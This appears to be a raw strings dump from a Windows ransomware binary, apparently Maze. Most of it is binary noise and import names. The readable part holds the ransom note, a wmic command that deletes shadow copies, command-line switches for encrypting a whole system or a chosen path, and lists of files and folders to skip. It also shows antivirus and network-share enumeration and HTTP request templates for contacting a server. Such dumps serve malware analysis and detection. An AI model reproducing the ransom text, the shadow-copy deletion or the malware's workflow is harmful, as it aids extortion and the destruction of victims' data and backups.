!This program cannot be run in DOS mode.
`.rdata
@.data
D$@WVPh
NGGCCCC
user32.dll
DDDD^_[]
user32.dll
kernel32.dll
kernel32.dll
DDDDWh?"
kernel32.dll
DDDD^_[]
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
DDDDDDDDVhz'@
kernel32.dll
PSh))@
PWh^1@
FFFFVj
$NAOSAAAAj
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
@@@@@UPh
kernel32.dll
t$,Pho9@
kernel32.dll
user32.dll
Uj PhSA@
\$(j@h
D$ PShGC@
DDDDDDDD
SWh[E@
7Ph<G@
WPh>H@
VPh}H@
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
DDDDVhWM@
kernel32.dll
PUh6O@
DDDD^_[]
kernel32.dll
$NAOSAAAAj
kernel32.dll
kernel32.dll
QPh'W@
SPhwW@
kernel32.dll
D$0PVh-#
kernel32.dll
user32.dll
DDDDSh
DDDDVj
kernel32.dll
t$ Uh.[@
kernel32.dll
^_[]DDDD
DDDDDDDD
kernel32.dll
$Uh0^@
DDDDDDDD
CCCCCCCCShw`@
user32.dll
$Uh1a@
DDDDDDDD
jShed@
kernel32.dll
user32.dll
4$hOg@
KKKKKKKKSh
user32.dll
DDDDDDDDSVUWh
L$ WPQW
G j PV
3<$3l$
+q +Q$f
+q +Q$f
D$4VUP
D$\WVP
t$<VWU
l$(SWU
l$(SWU
t$`)D$
\$,+L$l
T$,)L$
|$X+\$h
DDDD^_[]
#D$<3D$@
3T$H#D$,#T$81
\$ #L$$#\$
#t$(#L$01
\$D#D$
D$H#L$D
D$(#L$
t$$#D$@1
D$8#L$<
D$$#L$H
D$@3T$
#L$,#t$(
L$(#L$8
D$4FFFFFFFF
D$Hy!~
DDDDDDDD
D$pWPh`-A
DDDDDDDD
DDDDj VSh
|$0WSh[.A
DDDDDDDDWhy.A
D$tPWSh
DDDDDDDD
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
WBBBBBBBB9
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
L$ PhjCA
$jhbGD
t$<h:EA
kernel32.dll
4^DDDD
4^DDDD
kernel32.dll
kernel32.dll
 ^_[]DDDD
ole32.dll
ole32.dll
ole32.dll
ole32.dll
aPh>MA
t$(hLHD
user32.dll
kernel32.dll
^_[]DDDD
kernel32.dll
kernel32.dll
user32.dll
L$LjhbGD
D$xctio
D$tdire
D$pFsRe
D$low64
D$hertW
D$d4Rev
D$`Wow6
^_[]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
DDDD@Ph
DDDDDDDDSh+iA
DDDD@PhRiA
kernel32.dll
7^_[]DDDD
DDDD^DDDD
^_[]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
DDDD^_[DDDD
^_[]DDDD
DDDD@@Ph
VPhWoA
DDDDDDDD
DDDD^_DDDD
DDDD^_DDDD
FFFFFFF
DDDD@Ph
DDDDDDDDVhLqA
DDDD@Ph
kernel32.dll
D$@PSj
D$@PVj
kernel32.dll
kernel32.dll
u>ShLtA
^_[]DDDD
D$@PhsvA
kernel32.dll
DDDD@@Ph
WPhXwA
DDDDDDDDUh
PWh/xA
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
D$@jnhOID
\$@jGh
|$ Wh_
user32.dll
kernel32.dll
user32.dll
DDDDDDDD
D<;VPh
DDDDDDDD9
D$8th: 
D$4Leng
D$0ent-
D$,ContS
D$DPhj
DDDDDDDD1
kernel32.dll
t$ Wh7
jPWVhy
user32.dll
user32.dll
DDDDVhV
^_[]DDDD
kernel32.dll
user32.dll
kernel32.dll
DDDDDDDD^_[]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
\$DjLh
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
D$h2123
D$d6543
D$`9887
D$\4678
D$X6525
D$T7897
D$P2154
D$L3743
D$D3245
D$@0987
DDDDDDDD
kernel32.dll
DDDDDDDD
kernel32.dll
DDDDDDDD
user32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
^_[]DDDD
 ]DDDD
4]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
DDDDDDDD]DDDD
 ]DDDD
8^_]DDDD
4]DDDD
@@@@@@@@
4]DDDD
`AAAAAAAA
kernel32.dll
kernel32.dll
4^_]DDDD
kernel32.dll
0]DDDD
kernel32.dll
kernel32.dll
T^]DDDD
0]DDDD
kernel32.dll
DDDDDDDD
GGGGWRQhr
DDDDDDDD
DDDDDDDD
L$ VQPh
L$ VQPh}
)D$ SR
$QPRh<
AAAA;H
AAAAAAAA;H
AAAA;H
AAAAAAAA;H
AAAARQPh
$AAAAAAA
DDDD^_[]
AAAAAAA
$AAAAAAA
DDDD^_[]
HHHHHHHH
DDDDDDDD^_[]
$AAAAAAA
AAAAAAA
DDDD^_[]
DDDDDDDD
L$,;L$(
AAAAAAA
DDDDDDDD
D$$Phl
HHHHHHHH
$AAAAAAA
$AAAAAAA
$AAAAAAA
$AAAAAAA
AAAAAAA
DDDD^_
DDDD^_
IIIIIIII
AAAAAAA
AAAAAAA
AAAAAAA
IIIIIIII
AAAAAAA
DDDD^_[]
$AAAAAAA
DDDD^_[]
$AAAAAAA
AAAAAAA
DDDD^_[]
$0<0u 
DDDD^_[]
GfBf%E
t)fIf!
f@@fNfHfN
GfHfNC
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
^_[DDDD
^_[DDDD
^_[DDDD
^[DDDD
^[DDDD
^[DDDD
DDDD^DDDD
|$DVhXEB
T^_DDDD
^_]DDDD
WVh#RB
DDDDDDDD
SVhmUB
DDDDDDDD
4$hVWB
VSh#XB
WVh@\B
SUhI_B
^_[]DDDD
@@@@@@
^_[]DDDD
@@@@@@
^_[]DDDD
DDDDWhLgB
DDDDDDDD
^_[]DDDD
SPh=yB
WVhx{B
t$ Wh7|B
^_[]DDDD
xGGGGGGGG9
^_[]DDDD
^_DDDD
^_DDDD
DDDD^_[]DDDD
^_[DDDD
DDDDDDDD^_[]DDDD
$^_[]DDDD
$DDDD^DDDD
^]DDDD
^]DDDD
^]DDDD
^]DDDD
P j@Rh
DDDDSh
^_[]DDDD
Sj Ph{
P j@Rh
DDDD^_[]DDDD
@@@@@@@@
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
advapi32.dll
advapi32.dll
advapi32.dll
user32.dll
kernel32.dll
DDDDDDDD^_[DDDD
advapi32.dll
kernel32.dll
kernel32.dll
advapi32.dll
advapi32.dll
advapi32.dll
kernel32.dll
kernel32.dll
user32.dll
DDDDDDDD
kernel32.dll
DDDDDDDD
kernel32.dll
DDDDDDDD
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
PQRVSh
kernel32.dll
RQUPhZ
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
^_DDDD
USWVPhx
advapi32.dll
kernel32.dll
user32.dll
kernel32.dll
advapi32.dll
advapi32.dll
DDDD^_[]
user32.dll
^_DDDD
^_DDDD
A,DDDD
u6jzh%
A(DDDD
w(^_DDDD
^_DDDD
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
DDDDSh
kernel32.dll
0^_DDDD
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_DDDD
^_[]DDDD
^_[]DDDD
kernel32.dll
kernel32.dll
user32.dll
kernel32.dll
^_[DDDD
DDDDDDDD
^_[DDDD
kernel32.dll
DDDDDDDD
kernel32.dll
^_[DDDD
DDDD^DDDD
$Vh2?C
user32.dll
kernel32.dll
DDDD^DDDD
kernel32.dll
H^_DDDD
DDDDDDDD^DDDD
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
kernel32.dll
kernel32.dll
kernel32.dll
D$pPj@S
kernel32.dll
D$pPj@S
kernel32.dll
D$pPj@
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
ole32.dll
ole32.dll
ole32.dll
FFFFFFFF
ole32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
t$,hicC
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
^_[]DDDD
USWVPj
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
DDDD^_[]DDDD
DDDDDDDD^_[]
user32.dll
gdi32.dll
kernel32.dll
gdi32.dll
gdi32.dll
gdi32.dll
kernel32.dll
gdi32.dll
D$ PUh7
gdi32.dll
gdi32.dll
gdi32.dll
gdi32.dll
|$4PQUh
user32.dll
kernel32.dll
user32.dll
user32.dll
kernel32.dll
gdi32.dll
gdi32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
kernel32.dll
user32.dll
l$ PWh
gdi32.dll
gdi32.dll
gdi32.dll
^_[]DDDD
user32.dll
kernel32.dll
kernel32.dll
^_DDDD
USWVPh
t$ Phv
kernel32.dll
t$ PhN
user32.dll
D$D394
D$@4628
kernel32.dll
^_DDDD
kernel32.dll
^[DDDD
user32.dll
^_DDDD
kernel32.dll
cwtP0wt
\v`6\v
$?t0'?t
~)t@i"tp
83729304958372930dhejskrlt9483s
.action
.phtml
.shtml
register
logout
content
private
messages
account
webauth
webaccess
archive
signin
signout
update
support
ticket
tracker
analytics
checkout
payout
withdrawal
create
transfer
http://%s%s
ntdll.dll
NtQueryEaFile
NAOSEC
NtSetEaFile
D7q/;M
Wow64RevertWow64FsRedirection
Wow64DisableWow64FsRedirection
realloc
msvcrt.dll
malloc
GET /%s HTTP/1.1
User-Agent: %s
Host: %s
Connection: Keep-Alive
POST /%s HTTP/1.1
User-Agent: %s
Host: %s
Content-Type: %s
Content-Length: %d
Connection: Keep-Alive
Content-Length: 
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
application/x-www-form-urlencoded
37432154789765254678988765432123
09873245
Error: incorrect --path parameter syntax
Syntax:
--path "C:\path\example\super database\"
Exiting...
expand 32-byte kexpand 16-byte kJ
AdjustWindowRect
DeferWindowPos
DestroyWindow
CloseWindow
EnumChildWindows
AnimateWindow
wsprintfA
MessageBoxW
wsprintfW
GetForegroundWindow
MessageBoxA
PostQuitMessage
ShutdownBlockReasonCreate
DefWindowProcA
ShutdownBlockReasonDestroy
RegisterClassExW
CreateWindowExW
GetMessageA
TranslateMessage
DispatchMessageA
ReleaseDC
USER32.dll
SetPaletteEntries
SelectPalette
GetDeviceCaps
SetPixel
DeleteObject
GDI32.dll
GetVersionExA
MoveFileExA
GetWindowsDirectoryA
CreateFileA
GetFileSize
LocalAlloc
ReadFile
CloseHandle
WriteFile
DeviceIoControl
OpenMutexW
CreateMutexW
lstrlenA
GetModuleHandleA
LoadLibraryA
HeapAlloc
lstrcpyA
lstrcatA
GetProcAddress
lstrlenW
CreateDirectoryW
GetLastError
lstrcatW
lstrcpynW
FindNextFileW
lstrcmpW
FindClose
GetTickCount
VirtualFree
ExitThread
CreateThread
CreateFileW
TlsSetValue
OutputDebugStringW
VirtualAlloc
TlsGetValue
WaitForSingleObject
ExitProcess
CreateToolhelp32Snapshot
Process32FirstW
Process32NextW
GetModuleHandleW
GetSystemDirectoryW
CreateProcessW
GetShortPathNameW
ExpandEnvironmentStringsW
GetCurrentProcessId
VirtualQuery
VirtualProtect
IsBadReadPtr
FreeLibrary
lstrcmpA
AllocConsole
GetStdHandle
WriteConsoleW
UnmapViewOfFile
lstrcmpiW
lstrcpyW
SetFileAttributesW
MoveFileExW
FindFirstFileW
WaitForMultipleObjects
GetDriveTypeW
GetTickCount64
SetThreadExecutionState
GetCommandLineW
GetFileSizeEx
SetFilePointerEx
CreateFileMappingW
MapViewOfFile
GetCurrentProcess
LocalFree
GetUserDefaultUILanguage
InitializeCriticalSection
DeleteCriticalSection
SetLastError
EnterCriticalSection
LeaveCriticalSection
TerminateThread
GlobalAlloc
GlobalFree
KERNEL32.dll
InitializeSecurityDescriptor
LookupAccountSidW
LsaAddAccountRights
LsaClose
LsaFreeMemory
EncryptionDisable
EqualDomainSid
LsaCreateTrustedDomainEx
LsaQueryTrustedDomainInfo
CryptAcquireContextW
CryptGenKey
CryptExportKey
CryptDestroyKey
CryptReleaseContext
CryptGenRandom
AreAllAccessesGranted
GetSidSubAuthorityCount
GetSidSubAuthority
CryptImportKey
CryptEncrypt
CryptDecrypt
ADVAPI32.dll
SHGetFolderPathW
ShellExecuteExW
SHELL32.dll
LsaConnectUntrusted
Secur32.dll
DsRoleGetPrimaryDomainInformation
DsRoleFreeMemory
NETAPI32.dll
StrStrW
StrToIntA
SHLWAPI.dll
WNetOpenEnumW
WNetEnumResourceW
WNetAddConnection2W
WNetCloseEnum
MPR.dll
inet_pton
WS2_32.dll
InternetOpenA
InternetCrackUrlA
InternetConnectA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
InternetCloseHandle
InternetReadFile
WININET.dll
CryptBinaryToStringW
CryptStringToBinaryA
CryptBinaryToStringA
CRYPT32.dll
CoUninitialize
CoInitializeEx
CoCreateInstance
ole32.dll
OLEAUT32.dll
IsProcessorFeaturePresent
BINRES
msvcp5%d.dll
Uc32nbspacec97c98c99c100c101c102c103c104c105c106c107c108c109c110c111c112c113c114c115c116c117c118c119c120c121c122_0061h_0062h_0063h_0064h_0065h_0066h_0067h_0068h_0069h_006Ah_006Bh_006Ch_006Dh_006Eh_006Fh_0070h_0071h_0072h_0073h_0074h_0075h_0076h_0077h_0078h_0079h_007AhFLW33abcdefghijklmnopqrstuvwzyz. ABCDEFGHIJKLMNOPQRSTUVWXYZ. 1234567890.
rusqsuu=
prkMtx
e?#\Tn
Q4Rn>n
Y.LO3oYz
0x^#.hL
>*6$S<
%/ZU7~
I0'^a,
pf!qE^
d)z$vCq U
6^bE_2Cri<3$
X?Oo#
]5b"hs
lQN[,fzPm
q5roEra
;bh6b_
e?#\Tn
TW8Y~e?
r>0d1J
DfIB'h6B
@,tLW1
>isT2"
)?tG_`tz ,
nF=~Z:
0-L*V~T
6}mz>z_
lrU*Ce
V%9t{7}
`%-}vY
hh)o%(Q`
iYe#XMNhC
*iY}iX
XWK{a<
QD|=EU
#@uI3~E
Y^9p.:
"_8^uaW
C&C>@t.X
+=]MmXvp
,oN=N@4
~[Djw3
ww;_a
nF=~Z:
aZ4Oz%
GHw,!S
ppO+#L
S+aJ}m>
_2Oj]A
?l1t=;*S
>.bgJmE
+c.xcXK@D
-I=wZXz
KYCU;V
Fz&&wd
%GD@GD
oc1BLhX
2aWYDs7
o~E<\
oNK_HT
(OnT)il
([8EB&
,hSy3I
C:v@d=B
'TGt(v
Rm>;b<
2zYYl$
AA]Yc@DI%
y=:"i,O
hpZpS/
3DhEF)
`U!s'x
m><CZr
"i)R~I$
k&{Rt@R.
gq'~Io
SAD.`}
@$9>uu
%\>qwS
^Y!A{Q2
qX+<13OgK
qj2tnG
G$1Y_p!e
DSZGhq
/pOZog2
`]Vh4}f
q<uj;z
jD:*!u
cA7AO9]B'4
pxVDAc
UEhQt:_
J0fV23 0
{*.k-|
jGl@ur
4zHDbj:
)i_%S)
Ed{o*i
JzBdSx
=yxK{8
)&3'N@y
U=M7?LsZ
x=;P+{
/v:_xR
dIIJ<bK
%e%%e^
iVbV^Pp
fm=P6Ds
#HHx
j`@99bIQ
FKEapO
ej]WUg
lF2"Or
azyBRo
a:Z2-T
&6D+hux
O~OyJ5
hCAC@o
N@C~\F
lZKtk&
:k~d>2
+Sbf:O)
G={(i+
\>P_5K
v@q[kv
Z~^\Jx 
=WN\4nn
-)pKiY
jjjjjj
jjjjjj
jjjjjjj
@{0AFACED1-E828-11D1-9187-B532F1E9575D}
%s\%s.%s
target
%s%s%s%s
CLASSIFIED
SECRET
@\data1.tmp
eMicrosoft Enhanced Cryptographic Provider v1.0
%USERID%
%base64key%
nkernel32
__ProviderArchitecture
ROOT\cimv2
select * from Win32_ShadowCopy
Win32_ShadowCopy.id='%s'
Win32_ShadowCopy.ID='%s'
\wbem\wmic.exe
"%s" shadowcopy delete
A%windir%\system32\wbem\wmic
process call create "cmd /c start %s"
:\Windows
\Games\
\Tor Browser\
\ProgramData\
\cache2\entries\
\Low\Content.IE5\
\User Data\Default\Cache\
\All Users
\IETldCache\
\Local Settings\
\AppData\Local
AhnLab
Enc: %s
qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890
\Program Files
Encrypting whole system
Encrypting specified folder in --path parameter...
!Finished in %d ms!
B--logging
--nomutex
--noshares
--path
.Logging enabled | Maze
NO SHARES | 
NO MUTEX | 
Encrypting: 
%s.tmp
Global\%s
DECRYPT-FILES.txt
autorun.inf
boot.ini
desktop.ini
ntuser.dat
iconcache.db
bootsect.bak
ntuser.dat.log
thumbs.db
Bootfont.bin
overflow|
Broot\SecurityCenter2
Select * From AntiVirusProduct
displayName
|overflow|
%c_%c_%d/%d|
1234567890
Cqwertyuiopasdfghjklzxcvbnm1234567890                        
%shiberfil.sys
%spagefile.sys
%sswapfile.sys
CMaze Ransomware
Dear %s, your files have been encrypted by RSA-2048 and ChaCha algorithms
The only way to restore them is to buy decryptor
These algorithms are one of the strongest
You can read about them at wikipedia
If you understand the importance of situation you can restore all files by following instructions in DECRYPT-FILES.txt file
You can decrypt 3 files for free as a proof of work
We know that this computer is 
a standalone server
a server in corporate network
a workstation in corporate network
a primary domain controller
a backup server
very valuable for you
So we will give you appropriate price for recovering
\000.bmp
You need to buy decryptor in order to restore the files.
%s! Alert! %s! Alert! Dear %s Your files have been encrypted by %s! Attention! %s
